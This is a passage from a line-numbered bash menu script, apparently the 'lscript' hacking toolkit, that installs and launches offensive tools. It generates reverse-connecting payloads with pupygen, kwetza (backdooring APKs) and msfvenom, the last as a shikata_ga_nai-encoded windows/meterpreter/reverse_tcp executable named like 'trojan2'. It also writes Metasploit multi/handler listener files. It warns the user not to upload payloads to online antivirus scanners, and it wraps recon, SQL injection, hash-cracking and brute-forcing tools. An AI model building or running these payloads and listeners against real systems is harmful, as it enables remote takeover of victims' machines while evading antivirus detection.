  4668. echo -e "LPORT: "
  4669. read APKLP
  4670. elif [[ "$APKK" = 4 ]]
  4671. then
  4672. if [[ "$APKPROT" = "tcp" ]]
  4673. then
  4674. APKPROT="https"
  4675. else
  4676. APKPROT="tcp"
  4677. fi
  4678. elif [[ "$APKK" = 5 ]]
  4679. then
  4680. if [[ "$APKPERM" = "yes" ]]
  4681. then
  4682. APKPERM="no"
  4683. else
  4684. APKPERM="yes"
  4685. fi
  4686. elif [[ "$APKK" = "back" || "$APKK" = "b" ]]
  4687. then
  4688. break
  4689. elif [[ "$APKK" = "run" ]]
  4690. then
  4691. if [[ "$APK" = "\e[1;31mNONE\e[m" ]]
  4692. then
  4693. echo -e ""$RS"No apk specified."$CE""
  4694. sleep 3
  4695. continue
  4696. fi
  4697. if [[ "$APKLH" = "\e[1;31mNONE\e[m" ]]
  4698. then
  4699. echo -e ""$RS"No LHOST specified."$CE""
  4700. sleep 3
  4701. continue
  4702. fi
  4703. if [[ "$APKLP" = "\e[1;31mNONE\e[m" ]]
  4704. then
  4705. echo -e ""$RS"No LPORT specified."$CE""
  4706. sleep 3
  4707. continue
  4708. fi
  4709. cd /root/kwetza
  4710. python kwetza.py $APK $APKLH $APKPROT $APKLP $APKPERM
  4711. echo -e "$PAKTGB"
  4712. $READAK
  4713. fi
  4714. done
  4715. else
  4716. echo -e "$TNI"
  4717. read INSTALL
  4718. if [[ "$INSTALL" = "install" ]]
  4719. then
  4720. install_kwetza
  4721. else
  4722. continue
  4723. fi
  4724. fi
  4725. elif [[ "$KEYLOG" = "7" ]]
  4726. then
  4727. if [[ -f /usr/bin/shellter ]]
  4728. then
  4729. shellter
  4730. else
  4731. echo -e "$TNI"
  4732. read INSTALL
  4733. if [[ "$INSTALL" = "install" ]]
  4734. then
  4735. install_shellter
  4736. else
  4737. continue
  4738. fi
  4739. fi
  4740. elif [[ "$KEYLOG" = "2" ]]
  4741. then
  4742. if [[ -d /root/ezsploit ]]
  4743. then
  4744. cd /root/ezsploit/
  4745. ./ezsploit.sh
  4746. cd
  4747. echo -e "Go to metasploit menu to create a listener(Option "$YS"14"$CE")"
  4748. sleep 2
  4749. echo -e "Press "$YS"any key"$CE" to leave..."
  4750. $READAK
  4751. exec bash "$0"
  4752. else
  4753. echo -e "$TNI"
  4754. read INSTALL
  4755. if [[ "$INSTALL" = "install" ]]
  4756. then
  4757. install_ezsploit
  4758. else
  4759. continue
  4760. fi
  4761. fi
  4762. elif [[ "$KEYLOG" = "3" ]]
  4763. then
  4764. if [[ -d /root/pupy ]]
  4765. then
  4766. while true
  4767. do
  4768. clear
  4769. echo -e ""$YS" 1"$CE") Generate a payload"
  4770. echo -e ""$YS" 2"$CE") Start listener"
  4771. echo -e ""$YS" b"$CE") Go back"
  4772. echo -e ""$YS"00"$CE") Main menu"
  4773. echo -e ""$YS" 0"$CE") EXIT"
  4774. read -e PUPY
  4775. if [[ "$PUPY" = "1" ]]
  4776. then
  4777. clear
  4778. echo -e "Choose the target OS:"
  4779. echo -e ""$YS" 1"$CE") Windows"
  4780. echo -e ""$YS" 2"$CE") Linux"
  4781. echo -e ""$YS" 3"$CE") Android"
  4782. echo -e "Choose: "
  4783. read -e TAROS
  4784. if [[ "$TAROS" = "1" ]]
  4785. then
  4786. TAROS="windows"
  4787. elif [[ "$TAROS" = "2" ]]
  4788. then
  4789. TAROS="linux"
  4790. elif [[ "$TAROS" = "3" ]]
  4791. then
  4792. TAROS="android"
  4793. else
  4794. echo -e "Wrong choice.Returning to main manu..."
  4795. sleep 2
  4796. exec bash "$0"
  4797. fi
  4798. clear
  4799. echo -e "Enter your ip: "
  4800. read -e PUPYIP
  4801. clear
  4802. echo -e "Enter your port(e.g: 443): "
  4803. read -e PUPYPORT
  4804. clear
  4805. echo -e "Enter the full output path(e.g: /root/Desktop/payload1.exe)"
  4806. read -e PUPYPATH
  4807. cd /root/pupy/pupy
  4808. ./pupygen.py -O $TAROS -o "$PUPYPATH" connect --host "$PUPYIP":"$PUPYPORT"
  4809. cd
  4810. elif [[ "$PUPY" = "2" ]]
  4811. then
  4812. cd /root/pupy/pupy
  4813. ./pupysh.py
  4814. elif [[ "$PUPY" = "00" ]]
  4815. then
  4816. exec bash "$0"
  4817. elif [[ "$PUPY" = "back" || "$PUPY" = "b" ]]
  4818. then
  4819. break
  4820. elif [[ "$PUPY" = "0" ]]
  4821. then
  4822. exit
  4823. fi
  4824. done
  4825. else
  4826. echo -e "$TNI"
  4827. read INSTALL
  4828. if [[ "$INSTALL" = "install" ]]
  4829. then
  4830. install_pupy
  4831. else
  4832. continue
  4833. fi
  4834. fi
  4835. elif [[ "$KEYLOG" = "4" ]]
  4836. then
  4837. if [[ -d /root/zirikatu ]]
  4838. then
  4839. clear
  4840. echo -e "CAUTION: DO NOT upload it to anti-virus scanners online."
  4841. sleep 3
  4842. echo -e "You agree with that?("$YS"YES"$CE"/"$YS"*"$CE")"
  4843. read MUSTBEYES
  4844. if [[ "$MUSTBEYES" = "YES" ]]
  4845. then
  4846. clear
  4847. cd /root/zirikatu
  4848. ./zirikatu.sh
  4849. cd
  4850. fi
  4851. else
  4852. echo -e "$TNI"
  4853. read INSTALL
  4854. if [[ "$INSTALL" = "install" ]]
  4855. then
  4856. install_zirikatu
  4857. else
  4858. continue
  4859. fi
  4860. fi
  4861. elif [[ "$KEYLOG" = "5" ]]
  4862. then
  4863. if [[ -d /root/TheFatRat ]]
  4864. then
  4865. fatrat
  4866. else
  4867. echo -e "$TNI"
  4868. read INSTALL
  4869. if [[ "$INSTALL" = "install" ]]
  4870. then
  4871. install_thefatrat
  4872. else
  4873. continue
  4874. fi
  4875. fi
  4876. elif [[ "$KEYLOG" = "6" ]]
  4877. then
  4878. if [[ -d /root/Winpayloads ]]
  4879. then
  4880. cd /root/Winpayloads
  4881. ./WinPayloads.py
  4882. cd
  4883. else
  4884. echo -e "$TNI"
  4885. read INSTALL
  4886. if [[ "$INSTALL" = "install" ]]
  4887. then
  4888. install_winpayloads
  4889. else
  4890. continue
  4891. fi
  4892. fi
  4893. elif [[ "$KEYLOG" = "00" ]]
  4894. then
  4895. clear
  4896. exec bash "$0"
  4897. elif [[ "$KEYLOG" = "0" ]]
  4898. then
  4899. clear
  4900. exit
  4901. elif [[ "$KEYLOG" = "back" || "$KEYLOG" = "b" ]]
  4902. then
  4903. break
  4904. fi
  4905. echo -e "$PAKTGB"
  4906. $READAK
  4907. done
  4908. }
  4909. function information_gathering
  4910. {
  4911. while true
  4912. do
  4913. clear
  4914. TERMINALTITLE="INFORMATION GATHERING"
  4915. dash_calc
  4916. printf '\033]2;INFORMATION GATHERING\a'
  4917. if [[ -d /usr/share/sniper ]]
  4918. then
  4919. echo -e ""$YS" 1"$CE") Sniper Automated Pentest Recon Scanner"
  4920. else
  4921. echo -e ""$RS" 1"$CE") "$RS"Sniper"$CE" Automated Pentest Recon Scanner"
  4922. fi
  4923. if [[ -d /root/ReconDog ]]
  4924. then
  4925. echo -e ""$YS" 2"$CE") ReconDog All in one tool"
  4926. else
  4927. echo -e ""$RS" 2"$CE") "$RS"ReconDog"$CE" All in one tool"
  4928. fi
  4929. if [[ -d /root/RED_HAWK ]]
  4930. then
  4931. echo -e ""$YS" 3"$CE") RED HAWK All in one tool"
  4932. else
  4933. echo -e ""$RS" 3"$CE") "$RS"RED HAWK"$CE" All in one tool"
  4934. fi
  4935. if [[ -d /root/Infoga ]]
  4936. then
  4937. echo -e ""$YS" 4"$CE") Infoga Email Information Gathering"
  4938. else
  4939. echo -e ""$RS" 4"$CE") "$RS"Infoga"$CE" Email Information Gathering"
  4940. fi
  4941. if [[ -d /root/KnockMail ]]
  4942. then
  4943. echo -e ""$YS" 5"$CE") KnockMail Verify if email exists"
  4944. else
  4945. echo -e ""$RS" 5"$CE") "$RS"KnockMail"$CE" Verify if email exists"
  4946. fi
  4947. if [[ -d /root/operative-framework ]]
  4948. then
  4949. echo -e ""$YS" 6"$CE") Operative-framework Get information on website or target"
  4950. else
  4951. echo -e ""$RS" 6"$CE") "$RS"Operative-framework"$CE" Get information on website or target"
  4952. fi
  4953. if [[ -d /root/osrframework ]]
  4954. then
  4955. echo -e ""$YS" 7"$CE") Osrfconsole Perform accurate online researches"
  4956. else
  4957. echo -e ""$RS" 7"$CE") "$RS"Osrfconsole"$CE" Perform accurate online researches"
  4958. fi
  4959. echo -e ""$YS" b"$CE") Go back"
  4960. echo -e ""$YS"00"$CE") Main menu"
  4961. echo -e "Choose: "
  4962. read INFOG
  4963. clear
  4964. if [[ "$INFOG" = 1 ]]
  4965. then
  4966. if [[ -d /usr/share/sniper ]]
  4967. then
  4968. echo -e "Enter the domain you want to scan: "
  4969. read DOMAIN
  4970. clear
  4971. sniper $DOMAIN
  4972. else
  4973. echo -e "$TNI"
  4974. read INSTALL
  4975. if [[ "$INSTALL" = "install" ]]
  4976. then
  4977. install_sniper
  4978. else
  4979. continue
  4980. fi
  4981. fi
  4982. elif [[ "$INFOG" = 2 ]]
  4983. then
  4984. if [[ -d /root/ReconDog ]]
  4985. then
  4986. cd /root/ReconDog
  4987. python dog.py
  4988. cd
  4989. else
  4990. echo -e "$TNI"
  4991. read INSTALL
  4992. if [[ "$INSTALL" = "install" ]]
  4993. then
  4994. install_recondog
  4995. else
  4996. continue
  4997. fi
  4998. fi
  4999. elif [[ "$INFOG" = 3 ]]
  5000. then
  5001. if [[ -d /root/RED_HAWK ]]
  5002. then
  5003. cd /root/RED_HAWK
  5004. php rhawk.php
  5005. cd
  5006. else
  5007. echo -e "$TNI"
  5008. read INSTALL
  5009. if [[ "$INSTALL" = "install" ]]
  5010. then
  5011. install_redhawk
  5012. else
  5013. continue
  5014. fi
  5015.  
  5016. fi
  5017. elif [[ "$INFOG" = 4 ]]
  5018. then
  5019. if [[ -d /root/Infoga ]]
  5020. then
  5021. echo -e "Domain to search:"
  5022. read INFOTARG
  5023. echo -e "Data source(e.g. "$YS"all"$CE","$YS"google"$CE","$YS"bing"$CE","$YS"yahoo"$CE","$YS"pgp"$CE"): "
  5024. read INFOSOUR
  5025. clear
  5026. cd /root/Infoga
  5027. python infoga.py -t $INFOTARG -s $INFOSOUR
  5028. echo -e "$PAKTGB"
  5029. $READAK
  5030. cd
  5031. else
  5032. echo -e "$TNI"
  5033. read INSTALL
  5034. if [[ "$INSTALL" = "install" ]]
  5035. then
  5036. install_infoga
  5037. else
  5038. continue
  5039. fi
  5040.  
  5041. fi
  5042. elif [[ "$INFOG" = 5 ]]
  5043. then
  5044. if [[ -d /root/KnockMail ]]
  5045. then
  5046. clear
  5047. cd /root/KnockMail
  5048. python2.7 knock.py
  5049. cd
  5050. else
  5051. echo -e "$TNI"
  5052. read INSTALL
  5053. if [[ "$INSTALL" = "install" ]]
  5054. then
  5055. install_knockmail
  5056. else
  5057. continue
  5058. fi
  5059.  
  5060. fi
  5061. elif [[ "$INFOG" = 6 ]]
  5062. then
  5063. if [[ -d /root/operative-framework ]]
  5064. then
  5065. clear
  5066. cd /root/operative-framework
  5067. python2.7 operative.py
  5068. cd
  5069. else
  5070. echo -e "$TNI"
  5071. read INSTALL
  5072. if [[ "$INSTALL" = "install" ]]
  5073. then
  5074. install_operative
  5075. else
  5076. continue
  5077. fi
  5078.  
  5079. fi
  5080. elif [[ "$INFOG" = "7" ]]
  5081. then
  5082. if [[ -d "/root/hakkuframework" ]]
  5083. then
  5084. while true
  5085. do
  5086. printf '\033]2;OSRFCONSOLE\a'
  5087. clear
  5088. echo -e ""$YS" 1"$CE") usufy"
  5089. echo -e ""$YS" 2"$CE") mailfy"
  5090. echo -e ""$YS" 3"$CE") searchfy"
  5091. echo -e ""$YS" 4"$CE") domainfy"
  5092. echo -e ""$YS" 5"$CE") phonefy"
  5093. echo -e ""$YS" 6"$CE") entify"
  5094. echo -e ""$YS" b"$CE") Go back"
  5095. echo -e ""$YS"00"$CE") Main menu"
  5096. # echo -e ""$YS" 0"$CE") EXIT"
  5097. echo -e "Choose: "
  5098. read -e OSFR
  5099. clear
  5100. if [[ "$OSFR" = "1" ]]
  5101. then
  5102. echo -e "Use: usufy.py -n name1 name2 -p twitter facebook"
  5103. usufy.py
  5104. exit
  5105. elif [[ "$OSFR" = "2" ]]
  5106. then
  5107. echo -e "Use: mailfy.py -n name1"
  5108. mailfy.py
  5109. exit
  5110. elif [[ "$OSFR" = "3" ]]
  5111. then
  5112. searchfy.py
  5113. exit
  5114. elif [[ "$OSFR" = "4" ]]
  5115. then
  5116. domainfy.py
  5117. exit
  5118. elif [[ "$OSFR" = "5" ]]
  5119. then
  5120. phonefy.py
  5121. exit
  5122. elif [[ "$OSFR" = "6" ]]
  5123. then
  5124. entify.py
  5125. exit
  5126. elif [[ "$OSFR" = "0" ]]
  5127. then
  5128. exit
  5129. elif [[ "$OSFR" = "00" ]]
  5130. then
  5131. exec bash "$0"
  5132. elif [[ "$OSFR" = "back" || "$OSFR" = "b" ]]
  5133. then
  5134. break
  5135. else
  5136. echo -e "Wrong choice"
  5137. sleep 0.3
  5138. clear
  5139. exec bash "$0"
  5140. fi
  5141. done
  5142. else
  5143. echo -e "$TNI"
  5144. read INSTALL
  5145. if [[ "$INSTALL" = "install" ]]
  5146. then
  5147. install_osrframework
  5148. else
  5149. continue
  5150. fi
  5151. fi
  5152. elif [[ "$INFOG" = 0 ]]
  5153. then
  5154. exit
  5155. elif [[ "$INFOG" = 00 ]]
  5156. then
  5157. exec bash $0
  5158. elif [[ "$INFOG" = "back" || "$INFOG" = "b" ]]
  5159. then
  5160. break
  5161. fi
  5162. echo -e "$PAKTGB"
  5163. $READAK
  5164. done
  5165. }
  5166. function website_tools
  5167. {
  5168. while true
  5169. do
  5170. clear
  5171. TERMINALTITLE="WEBSITE TOOLS"
  5172. dash_calc
  5173. printf '\033]2;WEBSITE TOOLS\a'
  5174. if [[ -f /usr/bin/sqlmap ]]
  5175. then
  5176. echo -e ""$YS" 1"$CE") SQLmap Automatic SQL injection and database takeover tool"
  5177. else
  5178. echo -e ""$RS" 1"$CE") "$RS"SQLmap"$CE" Automatic SQL injection and database takeover tool"
  5179. fi
  5180. if [[ -d /root/leviathan ]]
  5181. then
  5182. echo -e ""$YS" 2"$CE") Leviathan Wide range mass audit toolkit"
  5183. else
  5184. echo -e ""$RS" 2"$CE") "$RS"Leviathan"$CE" Wide range mass audit toolkit"
  5185. fi
  5186. if [[ -d /root/NoSQLMap ]]
  5187. then
  5188. echo -e ""$YS" 3"$CE") NoSQLMap Automated NoSQL exploitation tool"
  5189. else
  5190. echo -e ""$RS" 3"$CE") "$RS"NoSQLMap"$CE" Automated NoSQL exploitation tool"
  5191. fi
  5192. echo -e ""$YS" b"$CE") Go back"
  5193. echo -e ""$YS"00"$CE") Main menu"
  5194. echo -e "Choose: "
  5195. read WEB
  5196. clear
  5197. if [[ "$WEB" = 1 ]]
  5198. then
  5199. if [[ -f /usr/bin/sqlmap ]]
  5200. then
  5201. sqlmap_menu
  5202. else
  5203. echo -e "$TNI"
  5204. read INSTALL
  5205. if [[ "$INSTALL" = "install" ]]
  5206. then
  5207. install_sqlmap
  5208. else
  5209. continue
  5210. fi
  5211. fi
  5212. elif [[ "$WEB" = 2 ]]
  5213. then
  5214. if [[ -d /root/leviathan ]]
  5215. then
  5216. cd /root/leviathan
  5217. python leviathan.py
  5218. else
  5219. echo -e "$TNI"
  5220. read INSTALL
  5221. if [[ "$INSTALL" = "install" ]]
  5222. then
  5223. install_leviathan
  5224. else
  5225. continue
  5226. fi
  5227. fi
  5228. elif [[ "$WEB" = 3 ]]
  5229. then
  5230. if [[ -d /root/NoSQLMap ]]
  5231. then
  5232. cd /root/NoSQLMap
  5233. python nosqlmap.py
  5234. else
  5235. echo -e "$TNI"
  5236. read INSTALL
  5237. if [[ "$INSTALL" = "install" ]]
  5238. then
  5239. install_nosqlmap
  5240. else
  5241. continue
  5242. fi
  5243. fi
  5244. elif [[ "$WEB" = "" ]]
  5245. then
  5246. continue
  5247. elif [[ "$WEB" = 0 ]]
  5248. then
  5249. exit
  5250. elif [[ "$WEB" = 00 ]]
  5251. then
  5252. exec bash $0
  5253. elif [[ "$WEB" = "back" || "$WEB" = "b" ]]
  5254. then
  5255. break
  5256. fi
  5257. #~ echo -e "$PAKTGB"
  5258. #~ $READAK
  5259. done
  5260. }
  5261. function other_tools
  5262. {
  5263. while true
  5264. do
  5265. printf '\033]2;OTHER TOOLS\a'
  5266. clear
  5267. TERMINALTITLE="OTHER TOOLS"
  5268. dash_calc
  5269. if [[ -f /usr/bin/geany ]]
  5270. then
  5271. echo -e ""$YS" 1"$CE") Geany Best notepad for linux"
  5272. else
  5273. echo -e ""$RS" 1"$CE") "$RS"Geany"$CE" Best notepad for linux"
  5274. fi
  5275. if [[ -d /root/dagon ]]
  5276. then
  5277. echo -e ""$YS" 2"$CE") Dagon Hash cracker/Advanced Hash Manipulation"
  5278. else
  5279. echo -e ""$RS" 2"$CE") "$RS"Dagon"$CE" Hash cracker/Advanced Hash Manipulation"
  5280. fi
  5281. if [[ -d /root/LALIN ]]
  5282. then
  5283. echo -e ""$YS" 3"$CE") LALIN Automatically install any package for pentest "
  5284. else
  5285. echo -e ""$RS" 3"$CE") "$RS"LALIN"$CE" Automatically install any package for pentest "
  5286. fi
  5287. if [[ -d /root/cupp ]]
  5288. then
  5289. echo -e ""$YS" 4"$CE") Cupp Make specific worldlists"
  5290. else
  5291. echo -e ""$RS" 4"$CE") "$RS"Cupp"$CE" Make specific worldlists"
  5292. fi
  5293. if [[ -d /root/cupp ]]
  5294. then
  5295. echo -e ""$YS" 5"$CE") Bleachbit Free up space"
  5296. else
  5297. echo -e ""$RS" 5"$CE") "$RS"Bleachbit"$CE" Free up space"
  5298. fi
  5299. if [[ -d /root/Hash-Buster ]]
  5300. then
  5301. echo -e ""$YS" 6"$CE") Hash Buster Hash cracker"
  5302. else
  5303. echo -e ""$RS" 6"$CE") "$RS"Hash Buster"$CE" Hash cracker"
  5304. fi
  5305. if [[ -d /root/patator ]]
  5306. then
  5307. echo -e ""$YS" 7"$CE") Patator Bruteforcer"
  5308. else
  5309. echo -e ""$RS" 7"$CE") "$RS"Patator"$CE" Bruteforcer"
  5310. fi
  5311. echo -e ""$YS" b"$CE") Go back"
  5312. echo -e ""$YS" 0"$CE") EXIT"
  5313. echo -e "Choose: "
  5314. read -e OTHERT
  5315. clear
  5316. if [[ "$OTHERT" = 1 ]]
  5317. then
  5318. if [[ -f /usr/bin/geany ]]
  5319. then
  5320. geany
  5321. else
  5322. echo -e "$TNI"
  5323. read INSTALL
  5324. if [[ "$INSTALL" = "install" ]]
  5325. then
  5326. install_geany
  5327. else
  5328. continue
  5329. fi
  5330.  
  5331. fi
  5332. elif [[ "$OTHERT" = 2 ]]
  5333. then
  5334. if [[ -d /root/dagon ]]
  5335. then
  5336. dagon_script
  5337. else
  5338. echo -e "$TNI"
  5339. read INSTALL
  5340. if [[ "$INSTALL" = "install" ]]
  5341. then
  5342. install_dagon
  5343. else
  5344. continue
  5345. fi
  5346.  
  5347. fi
  5348. elif [[ "$OTHERT" = 3 ]]
  5349. then
  5350. if [[ -d /root/LALIN ]]
  5351. then
  5352. cd /root/LALIN
  5353. ./Lalin.sh
  5354. cd
  5355. else
  5356. echo -e "$TNI"
  5357. read INSTALL
  5358. if [[ "$INSTALL" = "install" ]]
  5359. then
  5360. install_lalin
  5361. else
  5362. continue
  5363. fi
  5364. fi
  5365. elif [[ "$OTHERT" = "4" ]]
  5366. then
  5367. if [[ -d "/root/cupp" ]]
  5368. then
  5369. cd /root/cupp
  5370. python cupp.py -i
  5371. cd
  5372. echo -e "$PAKTGB"
  5373. $READAK
  5374. else
  5375. echo -e "$TNI"
  5376. read INSTALL
  5377. if [[ "$INSTALL" = "install" ]]
  5378. then
  5379. install_cupp
  5380. else
  5381. continue
  5382. fi
  5383. fi
  5384. elif [[ "$OTHERT" = "5" ]]
  5385. then
  5386. if [[ -f "/usr/bin/bleachbit" ]]
  5387. then
  5388. bleachbit
  5389. else
  5390. echo -e "$TNI"
  5391. read INSTALL
  5392. if [[ "$INSTALL" = "install" ]]
  5393. then
  5394. install_bleachbit
  5395. else
  5396. continue
  5397. fi
  5398. fi
  5399. elif [[ "$OTHERT" = "6" ]]
  5400. then
  5401. if [[ -d "/root/Hash-Buster" ]]
  5402. then
  5403. cd /root/Hash-Buster
  5404. python hash.py
  5405. echo -e "$PAKTGB"
  5406. $READAK
  5407. else
  5408. echo -e "$TNI"
  5409. read INSTALL
  5410. if [[ "$INSTALL" = "install" ]]
  5411. then
  5412. install_hashbuster
  5413. else
  5414. continue
  5415. fi
  5416. fi
  5417. elif [[ "$OTHERT" = "7" ]]
  5418. then
  5419. if [[ -d "/root/patator" ]]
  5420. then
  5421. patator_automation
  5422. echo -e "$PAKTGB"
  5423. $READAK
  5424. else
  5425. echo -e "$TNI"
  5426. read INSTALL
  5427. if [[ "$INSTALL" = "install" ]]
  5428. then
  5429. install_patator
  5430. else
  5431. continue
  5432. fi
  5433. fi
  5434. elif [[ "$OTHERT" = 00 ]]
  5435. then
  5436. clear
  5437. exec bash $0
  5438. elif [[ "$OTHERT" = "back" || "$OTHERT" = "b" ]]
  5439. then
  5440. break
  5441. elif [[ "$OTHERT" = 0 ]]
  5442. then
  5443. clear
  5444. exit
  5445. fi
  5446. done
  5447. }
  5448. function findsploit_menu
  5449. {
  5450. clear
  5451. echo -e "Search: "
  5452. read FSEARCH
  5453. findsploit "$FSEARCH"
  5454. echo -e "$PAKTGB"
  5455. $READAK
  5456. }
  5457. function metasploit_menu
  5458. {
  5459. if [[ ! -d "$LPATH"/rc ]]
  5460. then
  5461. mkdir "$LPATH"/rc
  5462. fi
  5463. while true
  5464. do
  5465. clear
  5466. TERMINALTITLE="METASPLOIT"
  5467. dash_calc
  5468. printf '\033]2;METASPLOIT\a'
  5469. echo -e ""$YS" 1"$CE") Create payload with msfvenom"
  5470. echo -e ""$YS" 2"$CE") Create listener"
  5471. echo -e ""$YS" 3"$CE") Saved listeners"
  5472. echo -e ""$YS" 4"$CE") Start msfconsole"
  5473. echo -e ""$YS" 5"$CE") Update msfconsole"
  5474. echo -e ""$YS" 6"$CE") Armitage"
  5475. echo -e ""$YS" 7"$CE") Findsploit"
  5476. echo -e ""$YS" b"$CE") Go back"
  5477. echo -e ""$YS" 0"$CE") EXIT"
  5478. echo -e "Choose: "
  5479. read -e METASP
  5480. clear
  5481. if [[ "$METASP" = "1" ]]
  5482. then
  5483. PAYLOADL=""
  5484. echo -e "PAYLOAD (Default: "$YS"windows/meterpreter/reverse_tcp"$CE"): "
  5485. read PAYLOADL
  5486. if [[ -z "$PAYLOADL" ]]
  5487. then
  5488. echo -e "Setting PAYLOAD to windows/meterpreter/reverse_tcp"
  5489. sleep 2
  5490. PAYLOADL="windows/meterpreter/reverse_tcp"
  5491. fi
  5492. echo -e "LHOST: "
  5493. read ATIP
  5494. echo -e ""
  5495. echo -e "LPORT: "
  5496. read ATPORT
  5497. echo -e ""
  5498. echo -e "Enter the target's architecture("$YS"x86"$CE"/"$YS"x64"$CE"): "
  5499. read TARCH
  5500. echo -e "Enter the name of the payload(e.g: "$YS"trojan2"$CE"): "
  5501. read ATEXE
  5502. ATEXEPATH="/root/Desktop/$ATEXE.exe"
  5503. clear
  5504. echo -e "Generating"
  5505. sleep 0.1
  5506. echo .
  5507. sleep 0.1
  5508. echo .
  5509. sleep 0.1
  5510. echo .
  5511. sleep 0.1
  5512. echo .
  5513. sleep 0.1
  5514. echo .
  5515. sleep 0.1
  5516. echo .
  5517. if [[ "$TARCH" = "x64" ]]
  5518. then
  5519. msfvenom -p $PAYLOADL --platform windows -a x64 -f exe -e x86/shikata_ga_nai LHOST="$ATIP" LPORT="$ATPORT" -o "$ATEXEPATH"
  5520. else
  5521. msfvenom -p $PAYLOADL --platform windows -a x86 -f exe -e x86/shikata_ga_nai LHOST="$ATIP" LPORT="$ATPORT" -o "$ATEXEPATH"
  5522. fi
  5523. echo -e "Done."
  5524. echo -e ""
  5525. echo -e "$PAKTC"
  5526. $READAK
  5527. clear
  5528. echo -e "Create a listener for this payload? $YNYES "
  5529. read PAYL
  5530. if [[ "$PAYL" != "n" ]]
  5531. then
  5532. echo -e "Name of listener(e.g: "$YS"john"$CE") : "
  5533. read NAMEL
  5534. echo "use exploit/multi/handler" > "$LPATH"/rc/"$NAMEL".rc
  5535. echo "set PAYLOAD $PAYLOADL " >> "$LPATH"/rc/"$NAMEL".rc
  5536. echo "set LHOST $ATIP " >> "$LPATH"/rc/"$NAMEL".rc
  5537. echo "set LPORT $ATPORT " >> "$LPATH"/rc/"$NAMEL".rc
  5538. echo "set ExitOnSession false" >> "$LPATH"/rc/"$NAMEL".rc
  5539. echo "exploit -j" >> "$LPATH"/rc/"$NAMEL".rc
  5540. clear
  5541. echo -e "Launch the listener now? "$YNONLY""
  5542. read LLN
  5543. if [[ "$LLN" = "y" ]]
  5544. then
  5545. echo -e "Launching msfconsole..."
  5546. sleep 2
  5547. clear
  5548. msfconsole -r "$LPATH"/rc/"$NAMEL".rc
  5549. fi
  5550. fi
  5551. elif [[ "$METASP" = "z" ]]
  5552. then
  5553. clear
  5554. echo -e "CAUTION: DO NOT upload it to anti-virus scanners online."
  5555. sleep 3
  5556. echo -e "You agree with that?("$YS"YES"$CE"/"$YS"*"$CE")"
  5557. read MUSTBEYES
  5558. if [[ "$MUSTBEYES" = "YES" ]]
  5559. then
  5560. clear
  5561. cd /root/zirikatu
  5562. ./zirikatu.sh
  5563. fi
  5564. elif [[ "$METASP" = "2" ]]
  5565. then
  5566. clear
  5567. echo -e "LHOST: "
  5568. read LHOSTL
  5569. echo -e "LPORT: "
  5570. read LPORTL
  5571. echo -e "PAYLOAD (Default: "$YS"windows/meterpreter/reverse_tcp"$CE"): "
  5572. read PAYLOADL
  5573. if [[ -z "$PAYLOADL" ]]
  5574. then
  5575. echo -e "Setting PAYLOAD to windows/meterpreter/reverse_tcp"
  5576. sleep 2
  5577. PAYLOADL="windows/meterpreter/reverse_tcp"
  5578. fi
  5579. echo -e "Name of listener(e.g: "$YS"john"$CE") : "
  5580. read NAMEL
  5581. echo "use exploit/multi/handler" > "$LPATH"/rc/"$NAMEL".rc
  5582. echo "set PAYLOAD $PAYLOADL " >> "$LPATH"/rc/"$NAMEL".rc
  5583. echo "set LHOST $LHOSTL " >> "$LPATH"/rc/"$NAMEL".rc
  5584. echo "set LPORT $LPORTL " >> "$LPATH"/rc/"$NAMEL".rc
  5585. echo "set ExitOnSession false" >> "$LPATH"/rc/"$NAMEL".rc
  5586. echo "exploit -j" >> "$LPATH"/rc/"$NAMEL".rc
  5587. clear
  5588. echo -e "Launch the listener now? "$YNONLY""
  5589. read LLN
  5590. if [[ "$LLN" = "y" ]]
  5591. then
  5592. echo -e "Launching msfconsole..."
  5593. sleep 2
  5594. clear
  5595. msfconsole -r "$LPATH"/rc/"$NAMEL".rc
  5596. fi
  5597. elif [[ "$METASP" = "3" ]]
  5598. then
  5599. while true
  5600. do
  5601. clear
  5602. ls -w 1 "$LPATH"/rc
  5603. echo -e ""
  5604. echo -e ""
  5605. echo -e "Enter the name of the listener you want to select(e.g: "$YS"john"$CE")"
  5606. echo -e ""$YS" r"$CE") Delete all saved listeners"
  5607. echo -e ""$YS" b"$CE") Go back"
  5608. read NAMERC
  5609. clear
  5610. if [[ "$NAMERC" = "back" || "$NAMERC" = "b" ]]
  5611. then
  5612. break
  5613. elif [[ "$NAMERC" = "reset" || "$NAMERC" = "r" ]]
  5614. then
  5615. rm -f "$LPATH"/rc/*
  5616. continue
  5617. fi
  5618. if [[ ! -f "$LPATH"/rc/"$NAMERC" ]]
  5619. then
  5620. NAMERC="$NAMERC".rc
  5621. if [[ ! -f "$LPATH"/rc/"$NAMERC" ]]
  5622. then
  5623. echo -e "File not found. Try again.."
  5624. sleep 2
  5625. continue
  5626. fi
  5627. fi
  5628. while true
  5629. do
  5630. clear
  5631. echo -e ""$NAMERC" selected."
  5632. echo -e ""$YS" 1"$CE") Start listener"
  5633. echo -e ""$YS" 2"$CE") Delete listener"
  5634. echo -e ""$YS" b"$CE") Go back"
  5635. echo -e "Choose: "
  5636. read LISTL
  5637. if [[ "$LISTL" = "1" ]]
  5638. then
  5639. msfconsole -r "$LPATH"/rc/"$NAMERC"
  5640. elif [[ "$LISTL" = "2" ]]
  5641. then
  5642. rm "$LPATH"/rc/"$NAMERC"
  5643. break
  5644. elif [[ "$LISTL" = "back" || "$LISTL" = "b" ]]
  5645. then
  5646. break
  5647. fi
  5648. done
  5649. done
  5650. elif [[ "$METASP" = "4" ]]
  5651. then
  5652. msfconsole
  5653. elif [[ "$METASP" = "5" ]]
  5654. then
  5655. msfupdate
  5656. elif [[ "$METASP" = "6" ]]
  5657. then
  5658. service postgresql start
  5659. armitage
  5660. clear
  5661. elif [[ "$METASP" = "7" ]]
  5662. then
  5663. findsploit_menu
  5664. elif [[ "$METASP" = "back" || "$METASP" = "b" ]]
  5665. then
  5666. BACKL="1"
  5667. break
  5668. elif [[ "$METASP" = "00" ]]
  5669. then
  5670. exec bash "$0"
  5671. elif [[ "$METASP" = "0" ]]
  5672. then
  5673. clear
  5674. exit
  5675. fi
  5676. done
  5677. }
  5678. function update_lscript
  5679. {
  5680. echo -e "Checking for updates..."
  5681. TESTINTERNETCONNECTION=$(curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//')
  5682. if [[ "$TESTINTERNETCONNECTION" != "" ]]
  5683. then
  5684. VER=$(timeout -s SIGTERM 20 curl "https://raw.githubusercontent.com/arismelachroinos/lscript/master/version.txt" 2>/dev/null)
  5685. if [[ "$VERSION" != "$VER" ]]
  5686. then
